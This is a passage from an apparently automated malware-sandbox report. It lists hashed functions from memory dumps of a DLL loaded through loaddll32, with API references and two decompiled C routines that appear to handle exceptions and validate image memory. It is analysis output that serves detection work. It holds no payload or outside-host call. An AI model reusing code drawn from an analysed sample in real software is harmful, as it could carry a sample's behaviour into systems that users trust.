                • Opcode Fuzzy Hash: 264a606b35063c7ea33b62417bfac11855558322b448b55edcca933e797433aa
                • Instruction Fuzzy Hash: 9222847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DF4D0 Relevance: 1.8, Strings: 1, Instructions: 583COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID: 0-3916222277
                • Opcode ID: f8b099e17aa770ec9532e6279bc87aa57e63f61320e9184c9368ef102e64273a
                • Instruction ID: 9dbcc8d617b4210a16a683abf4ff1e6570c20b251b025c882667bbcd6bc4efbf
                • Opcode Fuzzy Hash: f8b099e17aa770ec9532e6279bc87aa57e63f61320e9184c9368ef102e64273a
                • Instruction Fuzzy Hash: F7426730E00B458FCB29CF69C4906AAB7F1FF59304F28896DD48B9B755E774A586CB10
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E0CB2 Relevance: 1.8, APIs: 1, Instructions: 556COMMON
                Download Yara Rule
                APIs
                • memcpy.NTDLL(?,?,00000000,000000FE,?,?,00000000), ref: 046E1070
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: 667da8dc60931e01bb14bab750946fddc698049914cf61e4518a05deaec0d291
                • Instruction ID: 854e2a7aa4f2392c084421e5b7563b507ada3942615773610de33fd0b98ae563
                • Opcode Fuzzy Hash: 667da8dc60931e01bb14bab750946fddc698049914cf61e4518a05deaec0d291
                • Instruction Fuzzy Hash: 2F325770A01214DBDF19CF5AC4906BDBBF2FF55304F24859AD815AB386E774EA81DB80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C182F5 Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C182F5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x1c1a338; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x1c1a380 = 1;
										__eflags =  *0x1c1a380;
										if( *0x1c1a380 != 0) {
											goto L60;
										}
										_t84 =  *0x1c1a338; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x1c1a380 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x1c1a338 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x1c1a340 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x1c1a33c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x1c1a340 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x1c1a340 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x1c1a380 = 1;
							__eflags =  *0x1c1a380;
							if( *0x1c1a380 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x1c1a340 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x1c1a340 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x1c1a380 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x1c1a340 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x1c1a338 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x1c1a340 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x1c1a340 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                0x01c182ff
                0x01c18302
                0x01c18308
                0x01c18326
                0x00000000
                0x01c18326
                0x01c18310
                0x01c18319
                0x01c1831f
                0x01c1832e
                0x01c18331
                0x01c18334
                0x01c1833e
                0x01c1833e
                0x01c18340
                0x01c18343
                0x01c18345
                0x01c18345
                0x01c18347
                0x01c1834a
                0x00000000
                0x00000000
                0x01c1834c
                0x01c1834e
                0x01c183b4
                0x01c183b4
                0x01c18512
                0x00000000
                0x01c18512
                0x01c18350
                0x01c18350
                0x01c18354
                0x01c18356
                0x01c18356
                0x01c18356
                0x01c18356
                0x01c18359
                0x01c1835a
                0x01c1835d
                0x01c1835d
                0x01c18361
                0x01c18365
                0x01c18373
                0x01c18373
                0x01c1837b
                0x01c18381
                0x01c18383
                0x01c18385
                0x01c18395
                0x01c183a2
                0x01c183a6
                0x01c183ab
                0x01c183ad
                0x01c1842b
                0x01c1842b
                0x01c183af
                0x01c183af
                0x01c183af
                0x01c1842d
                0x01c1842f
                0x01c18510
                0x01c18510
                0x00000000
                0x01c18435
                0x01c18435
                0x01c1843c
                0x00000000
                0x00000000
                0x01c18442
                0x01c18446
                0x01c184a2
                0x01c184a4
                0x01c184ac
                0x01c184ae
                0x01c184b0
                0x00000000
                0x00000000
                0x01c184b2
                0x01c184b8
                0x01c184ba
                0x01c184bc
                0x01c184d1
                0x01c184d1
                0x01c184d3
                0x01c18502
                0x01c18509
                0x00000000
                0x01c18509
                0x01c184d7
                0x01c184d8
                0x01c184da
                0x01c184dc
                0x01c184dc
                0x01c184de
                0x01c184e0
                0x01c184e2
                0x01c184f6
                0x01c184f6
                0x01c184f9
                0x01c184fb
                0x01c184fb
                0x01c184fc
                0x01c184fc
                0x00000000
                0x01c184e4
                0x01c184e4
                0x01c184e4
                0x01c184ed
                0x01c184ee
                0x01c184f0
                0x01c184f2
                0x01c184f2
                0x00000000
                0x01c184e4
                0x01c184e2
                0x01c184be
                0x01c184c5
                0x01c184c5
                0x01c184c7
                0x00000000
                0x00000000
                0x01c184c9
                0x01c184ca
                0x01c184cd
                0x01c184cf
                0x00000000
                0x00000000
                0x00000000
                0x01c184cf
                0x00000000
                0x01c184c5
                0x01c18448
                0x01c1844b
                0x01c18450
                0x00000000
                0x00000000
                0x01c18459
                0x01c1845b
                0x01c18461
                0x00000000
                0x00000000
                0x01c18467
                0x01c1846d
                0x00000000
                0x00000000
                0x01c18473
                0x01c18475
                0x01c1847e
                0x01c18482
                0x00000000
                0x00000000
                0x01c18488
                0x01c1848b
                0x01c1848d
                0x00000000
                0x00000000
                0x01c18494
                0x01c18496
                0x00000000
                0x00000000
                0x01c18498
                0x01c1849c
                0x00000000
                0x00000000
                0x00000000
                0x01c1849c
                0x00000000
                0x00000000
                0x00000000
                0x01c18387
                0x01c18387
                0x01c18387
                0x01c1838e
                0x00000000
                0x00000000
                0x01c18390
                0x01c18391
                0x01c18393
                0x00000000
                0x00000000
                0x00000000
                0x01c18393
                0x01c183bb
                0x01c183bd
                0x00000000
                0x00000000
                0x01c183cd
                0x01c183cf
                0x01c183d1
                0x00000000
                0x00000000
                0x01c183d7
                0x01c183de
                0x01c1840a
                0x01c1840a
                0x01c1840c
                0x01c1840e
                0x01c18422
                0x01c18424
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x01c18410
                0x01c18410
                0x01c18410
                0x01c18419
                0x01c1841a
                0x01c1841c
                0x01c1841e
                0x01c1841e
                0x00000000
                0x01c18410
                0x01c183e0
                0x01c183e0
                0x01c183e3
                0x01c183e5
                0x01c183f7
                0x01c183f7
                0x01c183fa
                0x01c183fc
                0x01c183fc
                0x01c183fd
                0x01c183fd
                0x01c18403
                0x01c18403
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x01c183e7
                0x01c183e7
                0x01c183e7
                0x01c183ee
                0x00000000
                0x00000000
                0x01c183f0
                0x01c183f0
                0x01c183f1
                0x00000000
                0x00000000
                0x00000000
                0x01c183f1
                0x01c183f3
                0x01c183f5
                0x01c18408
                0x00000000
                0x00000000
                0x00000000
                0x01c18408
                0x00000000
                0x01c183f5
                0x01c18367
                0x01c1836a
                0x01c1836d
                0x00000000
                0x00000000
                0x01c1836f
                0x01c18371
                0x00000000
                0x00000000
                0x00000000
                0x01c18371
                0x01c18336
                0x01c18338
                0x00000000
                0x00000000
                0x00000000
                0x00000000

                APIs
                • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 01C183A6
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: MemoryQueryVirtual
                • String ID:
                • API String ID: 2850889275-0
                • Opcode ID: 5788de331da6c71168bb3a0381be25682cee165133c2923ebf504b51df6dc25f
                • Instruction ID: 36dbc194bb0a7a50c75033ba1abbb5e68c87bd1b9b4f14dfb3c2a3d21f521a19
                • Opcode Fuzzy Hash: 5788de331da6c71168bb3a0381be25682cee165133c2923ebf504b51df6dc25f
                • Instruction Fuzzy Hash: F261F5307C8602CFEB2ACE2DC49072977A1FB47B64BA8852CD902C729DE730D942B750
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CF641 Relevance: 1.6, Strings: 1, Instructions: 343COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID: @
                • API String ID: 0-2766056989
                • Opcode ID: f86f12e13cd78f569b534fe0b2bfd48979d058aed749059fa06a831eb66540ca
                • Instruction ID: f37269da186c0fb70566dfecf4b6962a872a3af1bcda0bce70885a707b2a8a55
                • Opcode Fuzzy Hash: f86f12e13cd78f569b534fe0b2bfd48979d058aed749059fa06a831eb66540ca
                • Instruction Fuzzy Hash: C1D14D71A0024ADFCF18CF68D4905BEB7B2FF98314F24856DE85297390E771A955CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D9499 Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON
                Download Yara Rule
                APIs
                • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 046D9509
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CreateProcessUser
                • String ID:
                • API String ID: 2217836671-0
                • Opcode ID: 7057aaccf1ef2fd44afb6a59b0b8741260a41db2a5b44a6070ec7e0745944a66
                • Instruction ID: f06cade3e24717eee0d412d45ba89474d45c607083cad32a711a258780820041
                • Opcode Fuzzy Hash: 7057aaccf1ef2fd44afb6a59b0b8741260a41db2a5b44a6070ec7e0745944a66
                • Instruction Fuzzy Hash: D011A272104249BFEF025F99DC00DEA7BA6FF28364B455214FE1996120E736E971AB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CECE9 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                Download Yara Rule
                APIs
                • RtlNtStatusToDosError.NTDLL(00000000), ref: 046CED01
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorStatus
                • String ID:
                • API String ID: 1596131371-0
                • Opcode ID: d37939e3343897ac12358de52d183015afa422cacd47a39eeb1bdd1c82d2d0d4
                • Instruction ID: 0114e56b03267afd6be4a5f52986d4aa73c44314d09cb30e0105d9f9cc1fda3e
                • Opcode Fuzzy Hash: d37939e3343897ac12358de52d183015afa422cacd47a39eeb1bdd1c82d2d0d4
                • Instruction Fuzzy Hash: 9DC012325043026FDB086A11D81DE3A7F61EB90340F00941DB045CA070E675AC50C610
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E1DEA Relevance: .4, Instructions: 386COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
                • Instruction ID: 37bb05580ae3efb224e5ac30118ffc637203100c898d07479eb1ded158c55e2a
                • Opcode Fuzzy Hash: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
                • Instruction Fuzzy Hash: 06F14430A09649EBCB0CCF9AD0A04BDBBB2FF89314B14C19DE5966B785D7346A45CF14
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00DC0A64 Relevance: .2, Instructions: 176COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000001.00000002.510921716.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_dc0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fe123143a2a597ae7028cb8c9106cb29c1440b2ff6c147516b55ca1152ca1576
                • Instruction ID: e5a53005cb9b5708e33fda215bb40b528c0f2614fdcb6c450e98554abab9614e
                • Opcode Fuzzy Hash: fe123143a2a597ae7028cb8c9106cb29c1440b2ff6c147516b55ca1152ca1576
                • Instruction Fuzzy Hash: 2F61083590011ADFDF24DF50DA84BAABBB5FB84324F1981D8D9096B215D330EE95DFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00DC0B14 Relevance: .1, Instructions: 113COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000001.00000002.510921716.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_dc0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 892c46ab68a9a7c455b9328f591958cc0caa9b27ad465b0f348c2d9614ca5541
                • Instruction ID: 0c5173fe766feae98227769536015c8531cbbcd4637ba64e2c93777a38e7e554
                • Opcode Fuzzy Hash: 892c46ab68a9a7c455b9328f591958cc0caa9b27ad465b0f348c2d9614ca5541
                • Instruction Fuzzy Hash: 04410535A0011ADFDF14DF44DA84FA9BBB5FB88324F1991D9D8096B216D330AE81DFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00DC0BFC Relevance: .1, Instructions: 103COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000001.00000002.510921716.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_dc0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 34181cb298b9ebb261b6fc827779b03ef95010570c3b64f2a1e48dd541c684df
                • Instruction ID: 0ff7e1a27a05c9e7162a6dccb8bee5ab4d71b3e797ad866e5908e279b6cb1169
                • Opcode Fuzzy Hash: 34181cb298b9ebb261b6fc827779b03ef95010570c3b64f2a1e48dd541c684df
                • Instruction Fuzzy Hash: 0C413A3690021ADFDF20DF44CA84FA9BBB5FB48314F194598D9496B216D330EE95CF60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00DC0DF7 Relevance: .1, Instructions: 97COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000001.00000002.510921716.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_dc0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: aa391599a87f26d5eab22df2a57a3fefcd00e352b60ce1cddf8e3bf4d3be2f71
                • Instruction ID: 77cb4f0bd8614f8f4637b2d5731a21e3aede4f09ca3ab426ef23b9844a21065e
                • Opcode Fuzzy Hash: aa391599a87f26d5eab22df2a57a3fefcd00e352b60ce1cddf8e3bf4d3be2f71
                • Instruction Fuzzy Hash: 6821648AC09354BBEE414538C4EA7D21780E77F394FA57C39E8198B582A81C37DFB240
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00DC0DF9 Relevance: .1, Instructions: 96COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000001.00000002.510921716.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_dc0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 43134c780c4c62079c2536a2aec43182ac33b7f5157641fa51b711ff6ab45be4
                • Instruction ID: 4a7c51d54411888b0f0cc46cf8254025277ca9429f602dc0779e81cb610d4340
                • Opcode Fuzzy Hash: 43134c780c4c62079c2536a2aec43182ac33b7f5157641fa51b711ff6ab45be4
                • Instruction Fuzzy Hash: 7421628AC09364BBEE414538C4EA7D21780E77F394FA57C39E8198B582A81C37DFB240
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00DC0CE8 Relevance: .1, Instructions: 86COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000001.00000002.510921716.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_dc0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6101d6c8bbf9d043b3405ad5b125d0c72f0daac772f188aa36f29a39da668586
                • Instruction ID: 1dbfb855463a75bb98caabeb571054e170afcc963e077eb7671493da59aa4f4c
                • Opcode Fuzzy Hash: 6101d6c8bbf9d043b3405ad5b125d0c72f0daac772f188aa36f29a39da668586
                • Instruction Fuzzy Hash: 9D313776600216DFDB24DF58C984FA9BBB5FF88324F198198D90A6B615D330AD80CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C180D0 Relevance: .1, Instructions: 77COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 71%
                			E01C180D0(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E01C1823B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E01C182F5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E01C181E0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E01C1823B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E01C182D7(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                0x01c180d4
                0x01c180d5
                0x01c180d6
                0x01c180d9
                0x01c180db
                0x01c180de
                0x01c180df
                0x01c180e1
                0x01c180e2
                0x01c180e3
                0x01c180e6
                0x01c180f0
                0x01c181a1
                0x01c181a8
                0x01c181b1
                0x01c180f6
                0x01c180f6
                0x01c180fc
                0x01c18102
                0x01c18105
                0x01c18108
                0x01c1810c
                0x01c18111
                0x01c18116
                0x01c18196
                0x00000000
                0x01c18118
                0x01c18118
                0x01c18124
                0x01c18126
                0x01c18181
                0x01c18181
                0x01c18187
                0x00000000
                0x01c18128
                0x01c18137
                0x01c18139
                0x01c1813a
                0x01c1813b
                0x01c1813e
                0x01c1813e
                0x01c18140
                0x00000000
                0x01c18142
                0x01c18142
                0x01c1818c
                0x01c18144
                0x01c18144
                0x01c18148
                0x01c18150
                0x01c18155
                0x01c1815a
                0x01c18166
                0x01c1816e
                0x01c18175
                0x01c1817b
                0x01c1817f
                0x00000000
                0x01c1817f
                0x01c18142
                0x01c18140
                0x00000000
                0x01c18126
                0x01c1819a
                0x01c1819a
                0x01c1819a
                0x01c18116
                0x01c181b6
                0x01c181bd

                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                • Instruction ID: cb82c8ee1d6b302dd5c7aa37f094c5536560be14d97e42bc194a739499c87406
                • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                • Instruction Fuzzy Hash: 0621C433944605EBDB15DFA8C8808A7BBA5FF46350B498168DD158B249D730FA15DBE0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00DC0C57 Relevance: .1, Instructions: 71COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000001.00000002.510921716.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_dc0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 87a430a5e2ed3f1c4227b6f2eab8a72a1faaa1b3064adc0a261c4f03a8a5c6c4
                • Instruction ID: af26f34667b983181fd9b339372720595a96fabbd40289dab1678e417acc77e8
                • Opcode Fuzzy Hash: 87a430a5e2ed3f1c4227b6f2eab8a72a1faaa1b3064adc0a261c4f03a8a5c6c4
